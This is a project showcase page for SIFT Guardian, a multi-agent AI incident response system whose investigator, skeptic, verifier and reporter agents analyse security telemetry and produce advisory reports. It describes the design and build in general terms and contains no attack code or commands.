SIFT Guardian: Self-Correcting SecOps Agents

An autonomous, self-correcting multi-agent incident response system that automatically critiques and adjusts its own forensic investigation loops to generate security advisory reports.

Comment

Inspiration

Alert fatigue is one of the most critical issues facing modern Security Operations Centers (SOCs). Security analysts are constantly bombarded by logs, many of which are false alarms, while critical threats remain obscured due to missing forensic context. We wanted to build a system that mimics a real SecOps team—allowing specialized agents to not only analyze logs but also critique each other's work and automatically query the database for missing context, just like a human investigator would.

What it does

SIFT Guardian is an autonomous SecOps incident response system. When a telemetry payload (like an encoded PowerShell script, a malicious Word document spawning child processes, or a web shell injection) is submitted:

  1. The Investigator Agent performs initial threat signature analysis.
  2. The Skeptic Agent audits the findings. If confidence is low or telemetry categories (like Parent Process, Persistence, or Network Activity) are missing, it triggers a self-correction loop.
  3. The Investigator automatically performs reanalysis, querying the enterprise log database for the missing logs.
  4. The Verifier Agent approves the findings against telemetry sources.
  5. The Reporter Agent compiles a comprehensive, peer-reviewed Markdown intelligence advisory report.

How we built it

  • Backend: Built using C# on the latest .NET 10.0 SDK. We designed a decoupled transient/singleton dependency injection structure for specialized agent personas coordinated by a central AgentOrchestrator workflow manager.
  • Frontend: Constructed with Vanilla HTML5, CSS3, and JavaScript (ES6). It features a glowing cyberpunk grid command-center theme with a real-time topology flow-graph illustrating active agent states and self-correction cycles, and a custom logs terminal.

Challenges we ran into

Orchestrating agent collaboration dynamically without getting stuck in infinite loops. We solved this by developing structured context state maps that pass target feedback parameters (missing evidence classes) back to the investigator's reanalysis handler.

Accomplishments that we're proud of

  • Designing a visual dashboard that is highly premium and responsive, providing immediate visual feedback on multi-agent collaboration.
  • Implementing a fully functional self-correcting logic loop that dynamically gathers additional forensic evidence on-the-fly.

What we learned

We learned how to design contrasting agent personalities (a positive investigator vs. an aggressive skeptic) to achieve rigorous output validation that minimizes false positive rates.

What's next for SIFT Guardian: Self-Correcting SecOps Agents

  • Integrating real-time SIEM connectors (Splunk/Elasticsearch).
  • Enabling automated containment tasks (e.g. blocking IPs, isolating endpoints, or revoking OAuth tokens).

Built With

Share this project:

Updates